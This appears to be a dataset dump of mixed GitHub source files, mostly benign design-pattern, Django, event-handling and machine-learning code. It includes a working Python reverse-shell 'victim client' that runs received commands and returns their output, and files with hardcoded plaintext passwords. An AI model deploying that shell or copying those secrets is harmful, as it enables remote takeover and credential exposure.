blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
368ee4c27d66b11e3b186093eb0bda683464e2e0 | 23ed2df78ede14883d35b19844790a78db5405ca | /python/python-design-patterns/abstract_factory.py | 29067ce73dfb54a13e56147fe6f77d7f2f155684 | [] | no_license | sosflyyi/source | 703b7128a962f0a257beb59b421ddf0077b878c5 | e0734786e1af76785a379f7bb752efb5de194b35 | refs/heads/master | 2023-04-08T13:10:43.356801 | 2017-06-07T07:13:08 | 2017-06-07T07:13:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,879 | py | #!/usr/bin/env python
# coding=utf-8
# http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/
"""
This pattern is a lot simpler to implement than the GoF example, because there's no need to inherit just to satisfy types. In the example below, the PetShop class has an abstract factory as a member (pet_factory). We can configure it at runtime with the desired concrete factory. The pet shop will then generate the appropriate pet type depending on its factory.
"""
#抽象工厂模式 abstract_factory
"""Implementation of the abstract factory pattern"""
import random
class PetShop:
"""A pet shop"""
def __init__(self, animal_factory=None):
"""pet_factory is our abstract factory.
We can set it at will."""
self.pet_factory = animal_factory
def show_pet(self):
"""Creates and shows a pet using the
abstract factory"""
pet = self.pet_factory.get_pet()
print("This is a lovely", pet)
print("It says", pet.speak())
print("It eats", self.pet_factory.get_food())
# Stuff that our factory makes
class Dog:
def speak(self):
return "woof"
def __str__(self):
return "Dog"
class Cat:
def speak(self):
return "meow"
def __str__(self):
return "Cat"
# Factory classes
class DogFactory:
def get_pet(self):
return Dog()
def get_food(self):
return "dog food"
class CatFactory:
def get_pet(self):
return Cat()
def get_food(self):
return "cat food"
# Create the proper family
def get_factory():
"""Let's be dynamic!"""
return random.choice([DogFactory, CatFactory])()
# Show pets with various factories
if __name__ == "__main__":
shop = PetShop()
for i in range(3):
shop.pet_factory = get_factory()
shop.show_pet()
print("=" * 20)
| [
"chenzhongtao@126.com"
] | chenzhongtao@126.com |
8eea73a4817b583b59e9ae72e614c0630731fafb | dcddc234eea906c63553f6495e182e44f3e8431d | /forum/migrations/0001_initial.py | 5ec4c7773023cc10c07b7d6d003e4cc6ea318831 | [
"MIT"
] | permissive | Kromey/akwriters | 53e648e1cc4c0970c843c9b426d0e7de21c9eabb | 72812b5f7dca3ad21e6e9d082298872b7fa607b9 | refs/heads/master | 2022-03-08T00:57:42.232126 | 2021-07-21T15:23:33 | 2021-07-21T15:23:33 | 28,463,802 | 0 | 0 | MIT | 2022-02-10T08:06:49 | 2014-12-24T22:41:56 | JavaScript | UTF-8 | Python | false | false | 2,238 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-01-20 01:11
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Board',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=25)),
('slug', models.SlugField(blank=True, max_length=25)),
('description', models.CharField(max_length=255)),
('parent', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='forum.Board')),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subject', models.CharField(max_length=128)),
('body', models.TextField()),
('left', models.PositiveIntegerField(default=0)),
('right', models.PositiveIntegerField(default=0)),
],
options={
'ordering': ('left',),
},
),
migrations.CreateModel(
name='Topic',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('board', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='forum.Board')),
],
),
migrations.AddField(
model_name='post',
name='topic',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='forum.Topic'),
),
migrations.AddField(
model_name='post',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"travisvz@gmail.com"
] | travisvz@gmail.com |
233b661904e8d0b44aedd76dc4b3433a2a440670 | 35a1fc9f67def5866673369eb9d68f11e8f2a4c9 | /Reverse-Shell/cliente-victima.py | bf73693d9f0047b68b616c3a35d183aa7f0ad931 | [] | no_license | Suz4nGG/ShellCodes | fe62a5dbee865d931622f716a58b3ed057c82d33 | 93d8a3d129939053583071ac88012b90ef9ecdc4 | refs/heads/master | 2023-06-06T09:34:17.698061 | 2021-06-25T04:44:48 | 2021-06-25T04:44:48 | 380,128,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,975 | py | import socket
import sys
import subprocess
import threading
import os
# Variables Globales
host = 'terminal'
puerto = 8000
FIN_COMANDO = b'#00#'
def mandar_comando(comando, socket):
"""
Envía el comando a través del socket, haciendo conversiones necesarias
Espera la respuesta del servidor y la regresa
comando viene como str
"""
comando += FIN_COMANDO
socket.send(comando)
def ejecutar_comando(comando):
"""
Esta función ejecuta un comando y regresa la salida binaria producida
En caso de error la función regresa False
Comando viene como cadena binaria
"""
comando = comando.decode('utf-8')
#print(comando)
proc = subprocess.Popen(comando, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
salida, error = proc.communicate()
if error:
return False
return salida
def leer_comando(cliente):
print('Reading commands..................')
"""
! Lee el canal de comunicacion del cliente y reconstruye el comando asociado
"""
comando = cliente.recv(2048)
#print(comando)
while not comando.endswith(FIN_COMANDO):
comando += cliente.recv(2048)
quitar_caracteres = len(FIN_COMANDO)
return comando[:-quitar_caracteres]
def atender_servidor(cliente):
comando = ''
while comando != b'exit':
comando = leer_comando(cliente)
if comando.startswith(b'cd'):
ruta = extraer_ruta_cd(comando)
if ruta == False:
salida = False
else:
salida = ejecutar_cd(ruta)
else:
salida = ejecutar_comando(comando)
#print(salida)
if salida == False:
mandar_mensaje(b'command not found', cliente)
else:
mandar_mensaje(salida, cliente)
cliente.close()
def ejecutar_cd(ruta):
try:
os.chdir(ruta)
return b''
except FileNotFoundError:
return False
# * Extraer ruta del cd
def extraer_ruta_cd(comando):
"""
! Exclusivo para parsear el comando cd
! Regresamos la ruta
"""
partes = comando.split(b' ')
if len(partes) != 2: # ! Error
return False
return partes[1]
def mandar_mensaje(mensaje, socket):
"""
Envia un mensaje a través del socket establecido
El mensaje debe ser una cadena binaria
"""
mensaje += FIN_COMANDO
socket.send(mensaje)
def inicializar_conexion(host, puerto):
cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
cliente.connect((host, int(puerto)))
except:
print('Se rechazo la conexion')
exit(1)
return cliente
if __name__ == '__main__':
###Entrada Xpro
var = "hola"
socket = inicializar_conexion(host, puerto)
# ! Creamos el hilo para establecer la consola y no se cierre
shell = threading.Thread(target=atender_servidor, args=(socket, ))
shell.start()
print(var) | [
"scxg240@gmail.com"
] | scxg240@gmail.com |
a361d35907779685397f0f0a4a923cdf43e26751 | 00ea1f84e959a8707024c61ee0a5d7a7c07dda31 | /src/events.py | 0aeeb3b4b3af94e49ff83229df7338f4cd815de6 | [] | no_license | kameko/server.py | b02b8cbaeb4c6bdcf3322582cdc662684a21ab25 | 89af5e9bd423f9a341cd6d30257a695df1763b13 | refs/heads/master | 2022-08-02T18:28:46.336419 | 2020-05-21T20:30:46 | 2020-05-21T20:30:46 | 264,576,817 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,391 | py |
from typing import Callable
import discord
class Events:
def __init__(self):
self.system_shutdown_callbacks = []
self.discord_message_recieve_callbacks = []
self.discord_message_updated_callbacks = []
# system
def on_system_shutdown(self, callback: Callable[[object], None]) -> None:
self.system_shutdown_callbacks.append(callback)
def request_system_shutdown(self, sender: object) -> None:
for callback in self.system_shutdown_callbacks:
callback(sender)
# discord
def on_discord_message_recieve(self, callback: Callable[[object, discord.Message], None]) -> None:
self.discord_message_recieve_callbacks.append(callback)
def request_on_discord_message_recieve(self, sender: object, message: discord.Message) -> None:
for callback in self.discord_message_recieve_callbacks:
callback(sender, message)
def on_discord_message_updated(self, callback: Callable[[object, discord.Message, discord.Message], None]) -> None:
self.discord_message_updated_callbacks.append(callback)
def request_on_discord_message_updated(self, sender: object, old_message: discord.Message, new_message: discord.Message) -> None:
for callback in self.discord_message_updated_callbacks:
callback(sender, old_message, new_message)
| [
"kameko.k@outlook.com"
] | kameko.k@outlook.com |
0b66c94d17a782202d69711a2d1968aafc8ee22f | 8f5fd71ad7eebff6d6090f8d368b71efe6e1ceb6 | /auto_project.bak/automation/app_projects/tools/ssh_open.py | e84d2c88bb8ace86e67965bec9f1065189ea0672 | [] | no_license | LDoctor/flask_auto | ed9111f93f479d389591b8b0da1afb72a5032640 | cf7a6f78f5b380f7a4c441c50248f3e3bf9aebe3 | refs/heads/master | 2022-11-05T00:22:33.620902 | 2020-06-19T10:48:56 | 2020-06-19T10:48:56 | 273,470,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,168 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 19-5-17 下午5:44
# @Author : nan
# @File : ssh_open.py
import os
import commands
import paramiko
import pexpect
from flask import current_app
from app_projects.tools.file_path import PathDir
def get_cmd(cmd):
_, r = commands.getstatusoutput(cmd)
return r
def ssh_popen_1(host, cmd, port=22, hostname='root'):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, port, hostname, key_filename=PathDir.awlcoud_idrsa())
stdin, stdout, stderr = ssh.exec_command(cmd)
return stdout.read().decode().strip()
def auto_code(ssh, code_key, _type='p'):
"""
:param ssh: ssh对象
:param code_key: 执行结果状态吗
:param _type: p / y p为密码验证 y为yes
:return:
"""
if code_key == 1:
if _type == 'p':
ssh.sendline('udsafe\n')
elif _type == 'y':
ssh.sendline('yes\n')
index = ssh.expect(["#", pexpect.EOF, pexpect.TIMEOUT])
else:
index = ssh.expect(["#", pexpect.EOF, pexpect.TIMEOUT])
if index == 0:
current_app.logger.info('logging error connect')
elif index == 1:
current_app.logger.info("上传3.0项目成功!")
elif index == 2:
current_app.logger.info("logging timeout exit")
def y_ssh(cmd):
# ssh = pexpect.spawn('scp -r {project_path} root@{panacube_ip}:/home/udsafe/'.format(
# project_path=project_path,
# panacube_ip=get_values('data', 'data').get('panacube').get('panacube_ip')
# )
# )
ssh = pexpect.spawn(cmd)
ssh.logfile = open('log.txt', 'w')
# code_key = ssh.expect([pexpect.TIMEOUT,'continue connecting (yes/no)?'], timeout=3)
code_pw = ssh.expect([pexpect.TIMEOUT, 'password:'], timeout=3)
auto_code(ssh, code_pw)
# if index == 0:
# current_app.logger.info('上传3.0项目成功')
# elif index == 1:
# current_app.logger.info("logging process exit!")
# elif index == 2:
# current_app.logger.info("logging timeout exit")
if __name__ == '__main__':
y_ssh('ls')
| [
"liyuhang@udsafe.com.cn"
] | liyuhang@udsafe.com.cn |
6094f82aee034e2c17d3f9619c003e48d77b2144 | cc75b7b27bb2b8b99947be21347e0cf50309ef8c | /credentials.py | e963ca32fc001d2e133d542c5bf42df06fbab9c6 | [] | no_license | the-knightfury/SATP-Event-Classification-V1 | 8d6d779ab9e7577e6691dd9187cc55a7f84a3c63 | 43851d483842dde562614e30c9c48ae4d773138c | refs/heads/master | 2023-01-22T12:53:21.750832 | 2020-12-01T07:00:45 | 2020-12-01T07:00:45 | 298,616,769 | 1 | 2 | null | 2020-09-25T16:40:57 | 2020-09-25T15:51:53 | Python | UTF-8 | Python | false | false | 92 | py | """
This is the credentials of TAGTOG
"""
USERNAME = 'ssp180002'
PASSWORD = '1234567' | [
"shahreeen@gmail.com"
] | shahreeen@gmail.com |
fe671448d1ff1c4f419072f381f827f8f1e18a76 | 57f50165f8344ba218de0f03a4ed344b1ed33532 | /google_net/google_cell.py | 258473030b04042cbb4f95315478893c32ab7ccc | [] | no_license | Zames-Chang/machine-learning-paper-review | 8308c04b6fbec12494df79197166a2b05ad1fb39 | 5cfaf57bf298b6639afbf878eb7a3de5c1517a0b | refs/heads/master | 2020-04-25T03:32:14.692516 | 2020-03-14T14:20:23 | 2020-03-14T14:20:23 | 172,480,371 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,222 | py | import tensorflow as tf
class google_net_cell(object):
def __init__(self,image_width,image_height,channel):
self.a = 0
self.width = image_width
self.height = image_height
self.channel = channel
self.filter_number = [channel,channel,channel,channel]
def get_padding(self,tensor,shape):
width = shape[0]
height = shape[1]
width2 = width // 2
height2 = height // 2
top = ((height - height2)//2)
bottom = (height - height2 - top)
left = ((width - width2) //2)
right = (width - width2 - left)
#print(right)
paddings = [[top,bottom,],[left,right]]
return ZeroPadding2D(paddings)(tensor)
def conv(self,input_data):
input_layer = tf.reshape(input_data, [-1, self.width, self.height, self.channel])
conv1 = tf.layers.conv2d(
inputs=input_layer,
filters=self.filter_number[0],
kernel_size=[1, 1],
padding="same",
activation=tf.nn.relu)
conv2_1 = tf.layers.conv2d(
inputs=input_layer,
filters=self.filter_number[1],
kernel_size=[1, 1],
padding="same",
activation=tf.nn.relu)
conv2_2 = tf.layers.conv2d(
inputs=conv2_1,
filters=self.filter_number[1],
kernel_size=[3, 3],
padding="same",
activation=tf.nn.relu)
conv3_1 = tf.layers.conv2d(
inputs=input_layer,
filters=self.filter_number[2],
kernel_size=[1, 1],
padding="same",
activation=tf.nn.relu)
conv3_2 = tf.layers.conv2d(
inputs=conv3_1,
filters=self.filter_number[2],
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
pool1 = tf.layers.average_pooling2d(inputs=input_layer, pool_size=[3, 3], strides=2)
padding_pool = self.get_padding(pool1,[self.width,self.height])
conv4 = tf.layers.conv2d(
inputs=conv2_1,
filters=self.filter_number[0],
kernel_size=[1, 1],
padding="same",
activation=tf.nn.relu)
return tf.concat([conv1,conv2_2,conv3_2,conv4],-1) | [
"z5254215560@gmail.com"
] | z5254215560@gmail.com |
b9bf63097708fa8eec2e1720fbe8ab1c635be2d0 | 3cf00c075549de7b945fbe8795faf20355292838 | /ex3.py | 0680fcaac983d1df0b7f191fc527a951e4710f96 | [] | no_license | alex-mclaughlin/hardway | b29664ee6a553d54be99f50b4e29fa4c614855bd | 9af78009e7f3a108d1aef264c372e40d4f185538 | refs/heads/master | 2021-05-12T16:40:07.898383 | 2018-06-22T05:07:03 | 2018-06-22T05:07:03 | 117,021,485 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | print "I will now count my chickens:"
#Im printing the chicken comments
print "Hens", 25.0 + 30 / 6
#I'm doing some addition and division
print "Roosters", 100 - 25 * 3 % 4
#etc etc etc
print "Now I will count the eggs:"
print 3 + 2 + 1 -5 + 4 % 2 - 1 / 4 +6
print "Is it true that 3 + 2 < 5-7?"
print 3+ 2 < 5 - 7
print "Oh, that's why it's False."
print "How about some more."
print "Is it greater?", 5> 2
| [
"amclaughlin@cmginc.com"
] | amclaughlin@cmginc.com |
ee2b1b7770b299963ac3f8b56329e70832f4db25 | 84364a1cc58712df61afd1c82ad45aefc761d25a | /portald/portald/wsgi.py | b020edf6050fdde9b786b982bcc7745c25b48ddd | [] | no_license | dbafurushima/portal-dashboard | 95c479206fee5512c0a661f5e11b9f956bd0346a | 43f2f76a7416bda864276b53d03be48293f1e707 | refs/heads/master | 2023-07-10T07:42:09.986599 | 2021-08-22T13:22:04 | 2021-08-22T13:22:04 | 288,833,570 | 0 | 1 | null | 2021-06-18T16:59:21 | 2020-08-19T20:43:53 | JavaScript | UTF-8 | Python | false | false | 391 | py | """
WSGI config for portald project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'portald.settings')
application = get_wsgi_application()
| [
"paulojrbeserra@gmail.com"
] | paulojrbeserra@gmail.com |
b186151473ccd843ebb0867eb5d9584dbb5d852d | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/yosinski_deep-visualization-toolbox/deep-visualization-toolbox-master/misc.py | ed1ee755e93c924c466045c1232ccace4c7d6ee6 | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 1,272 | py | #! /usr/bin/env python
import os
import time
import errno
class WithTimer:
def __init__(self, title = '', quiet = False):
self.title = title
self.quiet = quiet
def elapsed(self):
return time.time() - self.wall, time.clock() - self.proc
def enter(self):
'''Manually trigger enter'''
self.__enter__()
def __enter__(self):
self.proc = time.clock()
self.wall = time.time()
return self
def __exit__(self, *args):
if not self.quiet:
titlestr = (' ' + self.title) if self.title else ''
print 'Elapsed%s: wall: %.06f, sys: %.06f' % ((titlestr,) + self.elapsed())
def mkdir_p(path):
# From https://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def combine_dicts(dicts_tuple):
'''Combines multiple dictionaries into one by adding a prefix to keys'''
ret = {}
for prefix,dictionary in dicts_tuple:
for key in dictionary.keys():
ret['%s%s' % (prefix, key)] = dictionary[key]
return ret
| [
"659338505@qq.com"
] | 659338505@qq.com |
489ae2de0e81ea2265a337795af2556c86a36edb | f2f9a1ed111ba74e837751cb6b67e9c65cc91831 | /in_consistente.py | 0268e0e8973eb834942d141a135061a8d78fda9d | [] | no_license | matheuscoimbra/aritm-tica_calculo_python | cce94d4fbe9163f78f8b23715898fc52264f38d8 | 2c4b7a885f3fae4c195c9031222e298f13e518e3 | refs/heads/master | 2020-05-19T01:17:24.176893 | 2019-05-03T12:30:19 | 2019-05-03T12:30:19 | 184,751,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,430 | py | import numpy as np
import sys
import re
A = np.array([[6, 2, 0, 0, 0],
[-1, 7, 2, 0, 0],
[0, -2, 8, 2, 0],
[0, 0, 3, 7, -2],
[0, 0, 0, 0, 0]], dtype='double')
b = np.array([[2], [-3], [4], [-3], [0]], dtype='double')
# A = np.array([[1, 1, 1, 1, 1],
# [1, 2, 4, 1, 1],
# [0, 1, 2, 2, 2],
# [1, 2, 1, 3, 1],
# [3, 5, 1, 1, 1]], dtype='double')
#
# b = np.array([[0], [1], [1], [0], [0]], dtype='double')
# A = np.array([[1, 1, 1, 1, 1],
# [1, 2, 4, 1, 1],
# [0, 1, 2, 2, 2],
# [1, 2, 1, 3, 1],
# [0, 0, 0, 0, 0]], dtype='double')
#
# b = np.array([[0], [1], [1], [0], [3]], dtype='double')
# A = np.array([[1, 2, -3],
# [6, 3, -9],
# [7, 14, -21]
# ], dtype='double')
#
# b = np.array([[2], [6], [13]], dtype='double')
# A = np.array([[4, -6, -3],
# [1, 1, -2],
# [4, -20, -4]
# ], dtype='double')
#
# b = np.array([[12], [3], [6]], dtype='double')
# A = np.array([[1, -1, 3],
# [1, 1, 1],
# [2, -1, 5]
# ], dtype='double')
#
# b = np.array([[1], [-3], [0]], dtype='double')
# A = np.array([[3, -2, 3],
# [1, 3, 6],
# [2, 6, 12],
# ], dtype='double')
#
# b = np.array([[8], [-3], [-6]], dtype='double')
E = np.append(A, b, axis=1)
aux = np.copy(E[1, :])
E[1, :] = np.copy(E[0, :])
E[0, :] = np.copy(aux)
for i in range(1, len(E)):
for j in range(i, len(E)):
E[j, :] = E[j, :] - (E[j, i - 1] / E[i - 1, i - 1]) * E[i - 1, :]
print(E)
def det_zero(matrix):
if (~matrix.any(axis=0)).any() or (~matrix.any(axis=1)).any():
return True
else:
for i in range(len(matrix) - 1):
col = matrix[:, i]
lin = matrix[i, :]
for j in range(i, len(matrix) - 1):
if np.array_equal(matrix[:, j + 1], col) or np.array_equal(matrix[j + 1, :], lin):
return True
def row_zero(matrix):
index = -1
for i in range(len(matrix)):
lin = matrix[i, :]
if not np.any(lin) == True:
index = i
return index
return index
Ab = np.append(A, b, axis=1)
rankA = np.linalg.matrix_rank(A)
rankAb = np.linalg.matrix_rank(Ab)
# print("RankA: ",rankA," rankAb: ",rankAb)
m, n = np.shape(A)
col = b.tolist()
X = np.zeros(n)
det = det_zero(A)
nonB = np.delete(E, m, 1)
# print(nonB)
B = E[:, m]
if m == n:
ind = row_zero(nonB)
if (rankAb == rankA) and ind == -1:
print("Sistema é consistente e possui uma única solução")
else:
if ind != -1:
if B[ind] != 0.0: # verificar coluna tbm
print("Sistema é inconsistente")
else:
print("Sistema possui infinitas soluções")
E = np.delete(E, ind, 0)
# print(E)
b = E[:, m]
a = np.delete(E, m, 1)
tam = len(E)
l = 0
strr = ""
for i in range(tam):
ei = a[i] # linha
eii = a[i][i]
rep = 0
for k in range(len(ei)):
if ei[k] == 0.0 or ei[k] == eii:
if ei[k] == eii and rep !=1:
rep = 1
continue
strr += "{}x{} ".format(ei[k], k + 1)
regexp = re.compile(r'\s\d+(\s)?')
if regexp.search(strr):
# strr = strr.strip()
strr = strr.replace(" ", "+")
strr = "(" + strr + ")"
strr = strr.replace("+)", ")")
print("x{} ={} - {}/{}".format(i + 1, b[i], strr, eii))
strr = ""
all_zeros = not np.any(b)
if m < n:
print("Sistema é inconsistente")
if m > n:
if all_zeros == True:
print("Sistema possui infinitas soluções")
print("Sol.: ", X)
if rankA == min(m, n):
print("Sistema possui infinitas soluções")
| [
"noreply@github.com"
] | noreply@github.com |
06ef710b8f2fdb097d080989059ff6ff1ac7c29a | 821784089626ce4319dd98d8e16ee84b20b7da8e | /klass/urls.py | 372f46d61199432cac3687e6dbc718a15a07a2bd | [] | no_license | sousa-andre/mode | 504da0d49fbf6b5e13bf25702751169a77824a12 | cf2bc412674cf0af66a51c9ee90dcae65e02fe74 | refs/heads/master | 2022-11-18T22:03:22.449730 | 2020-07-20T20:49:26 | 2020-07-20T20:49:26 | 281,217,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | from django.urls import path
from .views import \
class_detail, ClassSubjectDetail, ClassSubjectFileCreate, \
ClassSubjectFileUpdate, ClassSubjectFileDelete, AppointmentCreate, AppointmentUpdate, AppointmentDelete
app_name = 'klass'
urlpatterns = [
path('', class_detail, name='class-detail'),
path('<int:pk>/ficheiros/', ClassSubjectDetail.as_view(), name='subject-detail'),
path('<int:pk>/ficheiros/criar/', ClassSubjectFileCreate.as_view(), name='subject-file-create'),
path('<int:pk>/ficheiros/atualizar/', ClassSubjectFileUpdate.as_view(), name='subject-file-update'),
path('<int:pk>/ficheiros/remover/', ClassSubjectFileDelete.as_view(), name='subject-file-delete'),
path('<int:pk>/agenda/criar/', AppointmentCreate.as_view(), name='appointment-create'),
path('<int:pk>/agenda/atualizar', AppointmentUpdate.as_view(), name='appointment-update'),
path('<int:pk>/agenda/remover', AppointmentDelete.as_view(), name='appointment-delete')
]
| [
"andrematosdesousa@gmail.com"
] | andrematosdesousa@gmail.com |
ba211ff0592056913e625a227169202735893887 | ef5d0cc333958ba6f990d352f6a8fc4f7c19c854 | /Client/GoUI/GoTimer.py | 5a7a3e6586ea8b090774fdd59aca236a2a3f2187 | [] | no_license | PolyProgrammist/GoGame | cdbc50db0e1a910e7c6ba328b9cf5f22deba133d | 2d358b992bce6b015ad051ece948f33d8fd39304 | refs/heads/master | 2020-05-24T16:55:22.748626 | 2017-04-21T21:23:25 | 2017-04-21T21:23:25 | 84,861,279 | 0 | 0 | null | 2017-04-13T00:53:35 | 2017-03-13T18:32:27 | Python | UTF-8 | Python | false | false | 1,154 | py | from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import QFrame
from PyQt5.QtWidgets import QLCDNumber
class Timer:
initsec = 30
gosec = 10
def __init__(self, maingo, layout, turn):
self.lcd = QLCDNumber()
self.sec = self.initsec
self.turn = turn
self.updui()
self.lcd.setFrameStyle(QFrame.NoFrame)
self.maingo = maingo
self.timer = QTimer(self.maingo.goui)
self.timer.timeout.connect(self.count_time)
self.timer.start(1000)
layout.addWidget(self.lcd)
def get_stime(self, seconds):
min = seconds // 60
sec = seconds % 60
return '{:0>2}'.format(min) + ':' + '{:0>2}'.format(sec)
def updui(self):
self.lcd.display(self.get_stime(self.sec))
def count_time(self):
if not self.turn:
return
self.sec -= 1
self.updui()
#hack
if self.sec == 0 and self.maingo.protor.step == self.turn:
self.maingo.protor.surrender()
self.timer.stop()
def go(self):
self.turn = not self.turn
if self.turn:
self.sec += self.gosec | [
"pechkin350@gmail.com"
] | pechkin350@gmail.com |
54f187e9c5b501a8ed168a86047576f181f1f10c | dca0b858b7c8a9b153148ac0d403c47590889a97 | /main.py | 83d5a19f228d954474702c1f1dcdb1838e189fae | [] | no_license | m-walters/traffic-stgcnn | 6cb9f0c9f90e2c5793b8374b289d007946f11083 | db85e319db6902b7131c407bd27a44d98f1313e7 | refs/heads/master | 2020-08-28T04:35:05.057506 | 2019-11-14T17:16:57 | 2019-11-14T17:16:57 | 217,592,256 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,824 | py | import numpy as np
import os
import pandas as pd
import logman
import fluxGrid
long2km = 1/0.011741652782473
lat2km = 1/0.008994627867046
if __name__ == "__main__":
# Logger -- see the logman README for usage
logfile = "run.log"
sformat = '%(name)s : %(message)s'
logger = logman.logman(__name__, "debug", sformat, logfile)
logger.add_handler("info", "%(message)s")
fullArea = True
if fullArea:
# From Liang's road spreadsheets
# Approximately 150x150 km
xmin = 115.5148074 * long2km
xmax = 117.26431366500 * long2km
ymin = 39.42848884480 * lat2km
ymax = 40.67874211840 * lat2km
dxCell, dyCell = 1., 1. #in km
else: #just to fifth ring
# From Liang's slides, the fifth ring
# Approximately 30x30 km
xmin = 116.1904 * long2km
xmax = 116.583642 * long2km
ymin = 39.758029 * lat2km
ymax = 40.04453 * lat2km
dxCell, dyCell = 0.1, 0.1 #in km
#TEMPORARY
dxCell = 0.5
dyCell = 0.5
fluxgrid = fluxGrid.fluxgrid([xmin,xmax,ymin,ymax],dxCell,dyCell,logfile)
data_dir = "/home/michael/msc/summer17/traffic/sample_data/processed_samples/"
all_dir = os.listdir(data_dir)
Nf = len(all_dir)
cnt = 0
for a_file in all_dir:
if cnt==10: break
cnt += 1
logger.printl("info","\nProcessing batch "+str(cnt)+ " of "+str(Nf)+", file "+a_file+"...")
data = pd.read_csv(data_dir+a_file, skiprows=1,
names=['long','lat','unix70ms','dt','timegroup','day'])
N = (long)(len(data.index))
data['long'] = data['long']*long2km
data['lat'] = data['lat']*lat2km
data = data.rename(columns={"long": "x", "lat": "y"}) #fluxgrid will want these
fluxgrid.process_batch(data)
| [
"michaelwalters3000@gmail.com"
] | michaelwalters3000@gmail.com |
0f6cb983c70f431d11b0779f341c352f377f63d2 | 5d4f3105136808a2632058848861226acf7abda5 | /website/matrixfactorization.py | 5792302c9feaa7a282dfc238b1cf664d6f39056a | [] | no_license | SunTzuLombardi/movie-recommender | 49961e70401052a21dad7e6690bce8ee2ed063d3 | a1489dbdb30f1e13d990af33ee10991b500fa8fe | refs/heads/master | 2022-01-09T02:55:47.040287 | 2019-02-15T11:01:24 | 2019-02-15T11:01:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,861 | py | import numpy as np
def predict(global_bias, user_bias, item_bias, user_embedding, item_embedding, u, i):
prediction = global_bias + user_bias[u] + item_bias[i] + np.dot(user_embedding[u],item_embedding[i])
return prediction
def train(ratings, k=40, learning_rate=0.0001, regularization=0, epochs=1):
n_users, n_items = ratings.shape
user_embedding = np.random.normal(scale = 1/k, size=(n_users, k))
item_embedding = np.random.normal(scale = 1/k, size=(n_items, k))
global_bias = np.mean(ratings[np.where(ratings != 0)])
user_bias = np.zeros(n_users)
item_bias = np.zeros(n_items)
rows, cols = np.nonzero(ratings)
for epoch in range(epochs):
p = np.random.permutation(len(rows))
rows, cols = rows[p], cols[p]
for u,i in zip(*(rows,cols)):
prediction = predict(global_bias, user_bias, item_bias, user_embedding, item_embedding, u, i)
actual = ratings[u,i]
e = actual - prediction
loss = e**2 + regularization*(np.linalg.norm(user_embedding[u]) + np.linalg.norm(item_embedding[i]) + user_bias[u] + item_bias[i])
user_bias[u] += learning_rate * (e - regularization * user_bias[u])
item_bias[i] += learning_rate * (e - regularization * item_bias[i])
user_embedding[u] += learning_rate * (e * item_embedding[i] - regularization * user_embedding[u])
item_embedding[i] += learning_rate * (e * user_embedding[u] - regularization * item_embedding[i])
return global_bias, user_bias, item_bias, user_embedding, item_embedding
def matrixfactorization_predict(user, ratings):
global_bias, user_bias, item_bias, user_embedding, item_embedding = train(ratings)
